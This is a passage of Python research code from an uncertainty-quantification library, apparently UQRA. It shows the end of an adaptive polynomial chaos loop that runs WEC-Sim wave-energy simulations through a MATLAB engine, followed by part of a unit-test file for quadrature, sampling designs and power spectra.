y_test_hat, n_centroid=5, epsilon=0.1)
else:
data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
y_test_hat, n_centroid=1, epsilon=0.2)
# data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
# data_ideg_QoIs[iqoi].y_test_hat, n_centroid=5, epsilon=0.2)
# data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1], xi_test,
# data_ideg_QoIs[iqoi].y_test_hat, n_centroid=20, epsilon=0.1)
data_ideg_QoIs[iqoi].DoI_xi_.append(data_cand_DoI_iqoi)
data_ideg_QoIs[iqoi].DoI_x_.append(solver.map_domain(data_cand_DoI_iqoi, dist_xi ))
print(' - {:<32s} : {} '.format('DoI candidate samples', data_cand_DoI_iqoi.shape ))
## get optimal samples for each QoI
print(' - {:<32s} : {:d}'.format('Adding DoI optimal samples', n_samples ))
xi_exploitation, idx_optimal_DoI = idoe_params.get_samples(data_cand_DoI_iqoi, orth_poly, n_samples, x0=[],
active_index= data_ideg_QoIs[iqoi].model_[-1].active_index, initialization='RRQR', return_index=True)
assert xi_exploitation.shape[1] == n_samples ## make sure return number of samples required
x_exploitation = solver.map_domain(xi_exploitation, dist_xi)
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploitation = []
for iHs, iTp in tqdm(x_exploitation.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploitation.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploitation = np.array(y_exploitation)
## save exploitation data
data_exploitation = uqra.Data()
data_exploitation.xi= xi_exploitation
data_exploitation.x = x_exploitation
data_exploitation.y = y_exploitation
data_ideg_QoIs[iqoi].exploitation_.append(data_exploitation)
## save all training samples together
data_train.xi = np.concatenate([data_train.xi, xi_exploitation], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploitation ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploitation ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
pce_model = uqra.PCE(orth_poly)
weight = doe_params.sampling_weight() ## weight function
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
print(' {:<20s}, prediction samples: {}'.format(headers[iqoi], xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estimated exceedance value', data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0',data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0*100))
## don't waste data, save this one sample into training set
data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
data_ideg_QoIs[iqoi].cv_err = data_ideg_QoIs[iqoi].cv_err_[-1]
data_ideg_QoIs[iqoi].score = data_ideg_QoIs[iqoi].score_ [-1]
data_ideg_QoIs[iqoi].model = data_ideg_QoIs[iqoi].model_ [-1]
data_ideg_QoIs[iqoi].y0_hat = data_ideg_QoIs[iqoi].y0_hat_[-1]
print(' 4. converge check ...')
is_QoIs_converge = []
y0_hat = np.array([ idata.y0_hat for idata in data_ideg_QoIs[iqoi].y0_hat_])
is_y0_converge , y0_converge_err = relative_converge(y0_hat, err=2*model_params.rel_err)
is_score_converge, score_converge = threshold_converge(data_ideg_QoIs[iqoi].score_)
## relative error of the PCE prediction vs the true response at the estimated design point
rel_err_x0 = abs(data_ideg_QoIs[iqoi].y0_hat.y0_hat - data_ideg_QoIs[iqoi].y0_hat.y0)\
/data_ideg_QoIs[iqoi].y0_hat.y0
data_ideg_QoIs[iqoi].iteration_converge = is_y0_converge and is_score_converge and rel_err_x0 < 0.1
print(' > QoI: {:<25s}'.format(headers[iqoi]))
print(' > Values: {}'.format(np.array(y0_hat)))
print(' > Rel Error : {:5.2f} %, Converge: {}'.format(y0_converge_err*100, is_y0_converge ))
print(' > Fit Score : {:5.2f} %, Converge: {}'.format(score_converge *100, is_score_converge ))
print(' > Error of response at x0: {}, {:5.2f} %, y0_hat: {:.2f}, y0: {:.2f}'.format(
data_ideg_QoIs[iqoi].y0_hat.x0_hat, rel_err_x0*100,
data_ideg_QoIs[iqoi].y0_hat.y0_hat, data_ideg_QoIs[iqoi].y0_hat.y0))
print(' -------------------------------------------')
i_iteration +=1
if data_ideg_QoIs[iqoi].iteration_converge:
print(' !< Iteration converge for order {:d} >!'.format(deg))
break
if data_train.x.shape[1] > model_params.alpha*orth_poly.num_basis:
print(' PCE(d={:d},p={:d}) !< Number of samples exceeding {:.2f}P >!'.format(
ndim, deg, model_params.alpha))
break
#### end sequential sampling inner loop
### check the deg outer loop,
data_degs_QoIs[deg] = copy.deepcopy(data_ideg_QoIs)
print('--------------------------------------------------')
print(' Model Performance up to order p={:d}'.format(deg))
is_QoIs_converge = []
is_QoIs_overfit = []
iheader = headers[iqoi]
data_iqoi = [data_ideg_QoIs[iqoi] for data_ideg_QoIs in data_degs_QoIs[model_params.degs[0]: deg+1]]
cv_err_iqoi_degs = np.array([idata.cv_err for idata in data_iqoi]).T
y0_hat_iqoi_degs = np.array([idata.y0_hat.y0_hat for idata in data_iqoi]).T
score_iqoi_degs = np.array([idata.score for idata in data_iqoi]).T
is_overfit , overfit_vals = overfitting_check(cv_err_iqoi_degs) ## check Overfitting
is_y0_converge , y0_converge_err = relative_converge(y0_hat_iqoi_degs, err=model_params.rel_err)
is_score_converge, score_converge = threshold_converge(score_iqoi_degs)
data_degs_QoIs[deg][iqoi].deg_overfit = is_overfit
data_degs_QoIs[deg][iqoi].deg_converge = is_y0_converge and is_score_converge
print(' > QoI: {:<25s}'.format(iheader))
print(' > Values: {}'.format(np.array(y0_hat_iqoi_degs)))
print(' > Overfit : {}; CV errors: {}'.format(is_overfit, overfit_vals))
print(' > Rel Error [%]: {:5.2f}, Converge: {}'.format(y0_converge_err*100, is_y0_converge ))
print(' > Fit Score [%]: {:5.2f}, Converge: {}'.format(score_converge *100, is_score_converge ))
print('--------------------------------------------------')
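## Degree-adaptation policy below: require at least three completed degrees before judging
## convergence; stop when the current degree converges (y0 and score) without overfitting and
## its inner iteration has converged; back off one degree if overfitting is detected;
## otherwise continue with the next degree.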
if len(y0_hat_iqoi_degs) < 3:
deg = deg + 1
continue
if not data_degs_QoIs[deg][iqoi].deg_overfit and data_degs_QoIs[deg][iqoi].deg_converge and \
data_degs_QoIs[deg][iqoi].iteration_converge:
break
elif data_degs_QoIs[deg][iqoi].deg_overfit:
deg = deg - 1
continue
else:
deg = deg + 1
return data_degs_QoIs
if __name__ == '__main__':
## ------------------------ Displaying set up ------------------- ###
r, theta = 0, 1  ## r is the index of the repeated MCS sample set, available values: 0 to 9
## batch parameters are used to assess the sampling uncertainty for the same theta and the same r
## not used in practice, only for benchmark validation
# ith_batch = 0
# batch_size = 1
random_state = 0
np.random.seed(random_state)
random.seed(random_state)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=1000)
np.set_printoptions(suppress=True)
uqra_env = uqra.environment.NDBC46022()
eng = matlab.engine.start_matlab()
out = io.StringIO()
err = io.StringIO()
## ------------------------ Define solver ----------------------- ###
# solver = uqra.FPSO(random_state=theta, distributions=uqra_env)
solver = uqra.Solver('RM3', 2, distributions=uqra_env)
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling('PCE')
model_params.degs = np.arange(2,8) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Heme'
model_params.dist_u = stats.uniform(0,1) #### random CDF values for samples
model_params.fitting = 'OLSLAR'
model_params.n_splits= 10
model_params.alpha = 3
model_params.num_test= int(1e7)
model_params.pf = np.array([1.0/(365.25*24*50)])
model_params.abs_err = 1e-4
model_params.rel_err = 2.5e-2
model_params.n_jobs = mp.cpu_count()
model_params.channel = [2, 12, 23, 24, 25]
model_params.y_scales= np.zeros(34)
model_params.y_scales[model_params.channel]= [1, 1e7, 1e6, 1e7, 1]
model_params.update_basis()
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters('MCS', 'S')
doe_params.update_poly_name(model_params.basis)
doe_params.num_cand = int(1e5)
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, model_params, doe_params)
filename_test = lambda r: r'McsE7R{:d}'.format(r)
sim_params.update_filenames(filename_test)
data_dir_cand = doe_params.data_dir_cand
data_dir_optimal= doe_params.data_dir_optimal
filename_testin = sim_params.fname_testin(r)
filename_test = sim_params.fname_test(r)
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
### 1. Get test data set
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
data_test.x = solver.map_domain(data_test.u, model_params.dist_u)
data_test.xi= model_params.map_domain(data_test.u, model_params.dist_u)
xi_test = data_test.xi[:, :model_params.num_test]
x_test = data_test.x [:, :model_params.num_test]
### 2. Get finished global data
filename = '{:s}_Adap{:d}{:s}_{:s}E5R{:d}_global.npy'.format(solver.nickname,
solver.ndim, model_params.basis[:3], doe_params.doe_nickname(), r)
global_data = np.load(os.path.join(data_dir_result, filename), allow_pickle=True).tolist()
headers = global_data[0].headers
print('\n#################################################################################')
print(' >>> File: ', __file__)
print(' >>> Start UQRA : Theta: {:d}'.format(theta))
print(' >>> Test data R={:d}'.format(r))
print('#################################################################################\n')
print(' > {:<25s}'.format('Input/Output Directories:'))
print(' - {:<23s} : {}'.format(' Candidate samples', data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
res = main(model_params, doe_params, solver, r=r, random_state=random_state, theta=theta)
filename = '{:s}_Adap{:d}{:s}_{:s}E5R{:d}S{:d}'.format(solver.nickname,
solver.ndim, model_params.basis, doe_params.doe_nickname(), r, theta)
eng.quit()
# ## ============ Saving QoIs ============
res = np.array(res, dtype=object)
try:
np.save(os.path.join(data_dir_result, filename), res, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except Exception:
np.save(filename, res, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
```
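The adaptive loop above relies on three helpers, `relative_converge`, `threshold_converge` and `overfitting_check`, whose definitions are not shown in this excerpt. The sketch below only illustrates the behavior implied by how they are called (each returns a boolean flag plus a diagnostic value); the default thresholds are assumptions, and the actual helpers in the script may differ.

```python
import numpy as np

def relative_converge(values, err=0.025):
    """Hypothetical sketch: converged if the last two estimates agree to within a relative error."""
    values = np.asarray(values, dtype=float).ravel()
    if values.size < 2:
        return False, np.inf
    rel_err = abs(values[-1] - values[-2]) / max(abs(values[-2]), 1e-12)
    return bool(rel_err < err), rel_err

def threshold_converge(scores, threshold=0.95):
    """Hypothetical sketch: converged if the latest fit score exceeds a threshold."""
    score = float(np.ravel(scores)[-1])
    return bool(score > threshold), score

def overfitting_check(cv_errors, n=3):
    """Hypothetical sketch: flag overfitting if the last n cross-validation errors keep increasing."""
    cv_errors = np.asarray(cv_errors, dtype=float).ravel()
    recent = cv_errors[-n:]
    is_overfit = recent.size >= 2 and bool(np.all(np.diff(recent) > 0))
    return is_overfit, recent
```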
#### File: UQRA/tests/test_basic.py
```python
import uqra, unittest,warnings,os, sys
from tqdm import tqdm
import numpy as np, scipy as sp
from uqra.solver.PowerSpectrum import PowerSpectrum
from uqra.environment import Kvitebjorn as Kvitebjorn
from sklearn import datasets
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold
import pickle
import chaospy as cp
import scipy.stats as stats
import uqra.utilities.helpers as uqhelpers
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/examples/JupyterNotebook'
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_mPCE(self):
foo = lambda x: x**3 + 0.5*x + np.random.randn(*x.shape)
dist = cp.Normal()
x = dist.sample(1000).reshape(1,-1)
print(x.shape)
y = np.squeeze(np.array([foo(x), foo(x)]).T)
print(y.shape)
# basis = cp.orth_ttr(5, dist)
foo_hat = uqra.PCE(5, dist)
foo_hat.fit(x, y, method='OLS')
y_pred = foo_hat.predict(x)
print(y_pred.shape)
foo_hat = uqra.mPCE(5, dist)
foo_hat.fit(x, y, method='OLS')
y_pred = foo_hat.predict(x)
print(y_pred.shape)
def test_moments(self):
# np.set_printoptions(precision=3)
data_dir = '/Volumes/External/MUSE_UQ_DATA/Ishigami/Data'
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set[-1,:])
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> GLK')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE6_GLK.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> OLS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> OLSLARS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLSLARS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> LASSOLARS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_LASSOLARS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
def test_loo(self):
# Loading some example data
X, y = datasets.load_boston(return_X_y=True)
# X = X[:100,:2]
# y = y[:100]
# X = np.array([[0, 0], [1, 1], [2, 2]])
# y = np.array([0, 1, 2])
# print(X.shape)
print(y[:5])
# Training classifiers
reg1 = LinearRegression()
reg1.fit(X,y)
y1 = reg1.predict(X)
# print(reg1.coef_)
print(y1[:5])
# b = np.linalg.lstsq(X,y)[0]
# # print(b)
# y2 = np.dot(X, np.array(b))
# print(y2[:5])
mse = []
kf = KFold(n_splits=X.shape[0])
residual = []
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
# H1 = np.linalg.inv(np.dot(X_train.T, X_train))
# H2 = np.dot(H1, X_train.T)
# H3 = np.dot(H2, y_train)
# y_hat = np.dot(X_test, H3)
# residual.append(y_test[0]- y_hat[0])
reg1.fit(X_train, y_train)
y_pred = reg1.predict(X_test)
residual.append(y_test[0] - y_pred[0])
# mse.append(uqra.metrics.mean_squared_error(y_test, y_pred))
Q, R = np.linalg.qr(X)
H = np.dot(Q, Q.T)
h = np.diagonal(H)
y_hat = np.dot(H, y)
e = (y-y_hat)/(1-h)
print(y_hat[:5])
print('e:')
print(np.mean(np.array(residual)**2))
print(np.mean(np.array(e)**2))
# print(uqra.metrics.leave_one_out_error(X,y,is_adjusted=False))
# print(np.mean(mse))
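# Note on the closed-form check above: for ordinary least squares, the leave-one-out residual
# of sample i can be computed without refitting as e_i = (y_i - y_hat_i) / (1 - h_ii), where
# h_ii are the leverages, i.e. the diagonal of the hat matrix H = X (X^T X)^{-1} X^T, obtained
# here from the thin QR factorization X = QR so that H = Q Q^T. The mean of e_i**2 should
# therefore match the brute-force KFold(n_splits=n) loop computed above.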
def test_QuadratureDesign(self):
print('>>> 1D quadrature design:')
p = 4
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',])
doe.samples()
print(' Legendre:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['normal',])
doe.samples()
print(' Hermite:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
print('>>> 1D quadrature design: Changing interval ')
a = -np.pi
b = np.pi
loc = a
scale = b - loc
print(' Legendre ({},{})'.format(np.around(a,2), np.around(b,2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',])
doe.samples()
print(' From changing interval after uqra.doe:')
print(' {:<15s} : {}'.format('Abscissa', np.around((b-a)/2*doe.u + (a+b)/2, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around((b-a)/2*doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',], dist_theta=[(loc, scale)])
doe.samples()
print(' Directly from uqra.doe:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
print('>>> 2D quadrature design:')
p = 4
doe = uqra.QuadratureDesign(p, ndim=2, dist_names=['uniform',])
doe.samples()
print(' Legendre:')
print(' {:<15s} :\n {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} :\n {}'.format('Weights' , np.around(doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=2, dist_names=['normal',])
doe.samples()
print(' Hermite:')
print(' {:<15s} :\n {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} :\n {}'.format('Weights' , np.around(doe.w, 2)))
def test_RandomDesign(self):
doe = uqra.RandomDesign('MCS', n_samples=1e6, ndim=3, dist_names='uniform', dist_theta=[(-np.pi, 2*np.pi),]*3)
doe.samples()
def test_LatinHyperCube(self):
doe = uqra.LHS(distributions=[sp.stats.norm,]*2)
doe_u, doe_x = doe.samples(2000)
print(doe_x.shape)
print(np.mean(doe_x, axis=1))
print(np.std(doe_x, axis=1))
np.save('/Users/jinsongliu/BoxSync/PhD_UT/Working_Papers/AdaptiveSparsePCE_OED/Data/LHS_Normal_2000', doe_x)
# doe = uqra.LHS(n_samples=1e3,dist_names=['uniform', 'norm'],ndim=2,dist_theta=[(-1, 2*2), (2,1)])
# doe.samples()
# print(np.mean(doe.x, axis=1))
# print(np.std(doe.x, axis=1))
def test_OptimalDesign(self):
"""
Optimal Design
"""
### Ishigami function
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/Ishigami/Data'
### SDOF system
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# data_dir = 'E:\Run_MUSEUQ'
np.random.seed(100)
# dist_x = cp.Normal()
dist_u= cp.Iid(cp.Normal(),2)
u_samples = dist_u.sample(100)
basis = cp.orth_ttr(10,dist_u)
X = basis(*u_samples).T
doe = uqra.OptimalDesign('D', n_samples=10)
doe_index = doe.samples(X, is_orth=True)
doe_index = doe.adaptive(X, n_samples=10)
print(doe_index)
doe_index = doe.adaptive(X, n_samples=10)
print(doe_index)
### 2D
# quad_orders = range(4,11)
# alpha = [1.0, 1.1, 1.3, 1.5, 2.0,2.5, 3.0,3.5, 5]
# dist_u= cp.Iid(cp.Normal(),2)
# for iquad_orders in quad_orders:
# basis = cp.orth_ttr(iquad_orders-1,dist_u)
# for r in range(10):
# filename = 'DoE_McsE6R{:d}_stats.npy'.format(r)
# data_set = np.load(os.path.join(data_dir, filename))
# samples_y = np.squeeze(data_set[:,4,:]).T
# filename = 'DoE_McsE6R{:d}.npy'.format(r)
# data_set = np.load(os.path.join(data_dir, filename))
# samples_u = data_set[0:2, :]
# samples_x = data_set[2:4, :]
# # samples_y = data_set[6 , :].reshape(1,-1)
# print('Quadrature Order: {:d}'.format(iquad_orders))
# print('Candidate samples filename: {:s}'.format(filename))
# print(' >> Candidate sample set shape: {}'.format(samples_u.shape))
# design_matrix = basis(*samples_u).T
# print(' >> Candidate Design matrix shape: {}'.format(design_matrix.shape))
# for ia in alpha:
# print(' >> Oversampling rate : {:.2f}'.format(ia))
# doe_size = min(int(len(basis)*ia), 10000)
# doe = uqra.OptimalDesign('S', n_samples = doe_size )
# doe.samples(design_matrix, u=samples_u, is_orth=True)
# data = np.concatenate((doe.I.reshape(1,-1),doe.u,samples_x[:,doe.I], samples_y[:,doe.I]), axis=0)
# filename = os.path.join(data_dir, 'DoE_McsE6R{:d}_p{:d}_OptS{:d}'.format(r,iquad_orders,doe_size))
# np.save(filename, data)
# for ia in alpha:
# print(' >> Oversampling rate : {:.2f}'.format(ia))
# doe_size = min(int(len(basis)*ia), 10000)
# doe = uqra.OptimalDesign('D', n_samples = doe_size )
# doe.samples(design_matrix, u=samples_u, is_orth=True)
# data = np.concatenate((doe.I.reshape(1,-1),doe.u,samples_x[:,doe.I], samples_y[:,doe.I]), axis=0)
# filename = os.path.join(data_dir, 'DoE_McsE6R{:d}_p{:d}_OptD{:d}'.format(r,iquad_orders,doe_size))
# np.save(filename, data)
def test_gauss_quadrature(self):
"""
https://keisan.casio.com/exec/system/1329114617
"""
print('========================TESTING: 1D GAUSS QUADRATURE=======================')
dists2test = [cp.Uniform(-1,1), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
rules2test = ['leg', 'hem', 'lag', 'jacobi']
order2test = [2,3,4,5,6,7,8]
for idist2test, irule2test in zip(dists2test, rules2test):
print('-'*50)
print('>>> Gauss Quadrature with polynominal: {}'.format(const.DOE_RULE_FULL_NAMES[irule2test.lower()]))
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', irule2test, order2test, idist2test)
uqra_samples = quad_doe.get_samples()
# quad_doe.disp()
uqra.enablePrint()
if irule2test == 'hem':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d_e, weight1d_e = np.polynomial.hermite_e.hermegauss(iorder)
print('{:<15s}: {}'.format('probabilist', np.around(coord1d_e,2)))
coord1d, weight1d = np.polynomial.hermite.hermgauss(iorder)
print('{:<15s}: {}'.format('physicist', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'leg':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d, weight1d = np.polynomial.legendre.leggauss(iorder)
print('{:<15s}: {}'.format('numpy ', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'lag':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d, weight1d = np.polynomial.laguerre.laggauss(iorder)
print('{:<15s}: {}'.format('numpy ', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'jacobi':
print('NOT TESTED YET')
print('Compared results here: https://keisan.casio.com/exec/system/1329114617')
def test_gpce(self):
print('==================TESTING: Generalized PCE (Not using SurrogateModel) ===================')
gpce_dist_to_test = [cp.Normal(), cp.Normal(2,3), cp.Gamma(1,1), cp.Beta(1,1)]
gpce_opt_dist = [cp.Normal(), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
gpce_opt_rule = ['hem', 'hem', 'lag', 'jacobi']
npoly_orders = range(2,5)
dist_zeta0 = cp.Normal()
for i, igpce_dist in enumerate(gpce_dist_to_test):
dist_zeta1 = gpce_opt_dist[i]
print('>>> Testing # {:d}: gpce: {}, zeta0: {} , zeta1: {}'.format(i, igpce_dist, dist_zeta0, dist_zeta1 ))
for ipoly_order in npoly_orders:
print(' Polynomial order: {:d}'.format(ipoly_order))
## gPCE with hermite chaos
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', 'hem', [ipoly_order+1], dist_zeta0)
samples_zeta= quad_doe.get_samples()
zeta_cor, zeta_weight = samples_zeta[0]
zeta_cor = zeta_cor.reshape((len(dist_zeta0),-1))
x_cor = igpce_dist.inv(dist_zeta0.cdf(zeta_cor))
zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta0, retall=True)
x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight,np.squeeze(x_cor),retall=True)
uqra.enablePrint()
print('\t Hermite: {}'.format( np.around(coeffs,4)))
## gPCE with optimal chaos
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', gpce_opt_rule[i], [ipoly_order+1], dist_zeta1)
samples_zeta= quad_doe.get_samples()
zeta_cor, zeta_weight = samples_zeta[0]
zeta_cor = zeta_cor.reshape((len(dist_zeta1),-1))
x_cor = igpce_dist.inv(dist_zeta1.cdf(zeta_cor))
zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta1, retall=True)
x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
uqra.enablePrint()
print('\t Optimal: {}'.format( np.around(coeffs,4)))
def test_PowerSpectrum(self):
print('========================TESTING: Power Spectrum =======================')
powerspecturms2test = ['jonswap']
powerspecturms_args = [(8, 10)]
df = 0.00001
f = np.arange(0, 10, df)
for psd_name, psd_args in zip(powerspecturms2test, powerspecturms_args):
psd = PowerSpectrum(psd_name, *psd_args)
psd_f, psd_pxx = psd.get_pxx(f)
psd_area = np.sum(psd_pxx * df)
np.save(os.path.join(data_dir,psd_name+'_psd_f'), psd_f)
np.save(os.path.join(data_dir,psd_name+'_psd_pxx'), psd_pxx)
tau, acf = psd.get_acf()
np.save(os.path.join(data_dir,psd_name+'_tau'), tau)
np.save(os.path.join(data_dir,psd_name+'_acf'), acf)
t, eta = psd.gen_process()
np.save(os.path.join(data_dir,psd_name+'_t'), t)
np.save(os.path.join(data_dir,psd_name+'_eta'), eta)
print(t, eta)
# t, eta = psd._gen_process_sum()
print('PSD name: {:s}, args: {}, Area: {:.2f}, 4*std:{}'.format(psd_name, psd_args, psd_area, 4*np.std(eta)))
def test_weighted_exceedance(self):
print('========================TESTING: Weighted Exceedance =======================')
# x = np.random.normal(size=1000).reshape(1,-1)
# res1 = stats.cumfreq(x)
# cdf_x = res1.lowerlimit + np.linspace(0, res1.binsize*res1.cumcount.size, res1.cumcount.size)
# cdf_y = res1.cumcount/x.size
# ecdf_y = 1- cdf_y
# ecdf_x = cdf_x
# print(np.around(ecdf_x,2))
# print(np.around(ecdf_y,2))
# res2 = uqhelpers.get_weighted_exceedance(x)
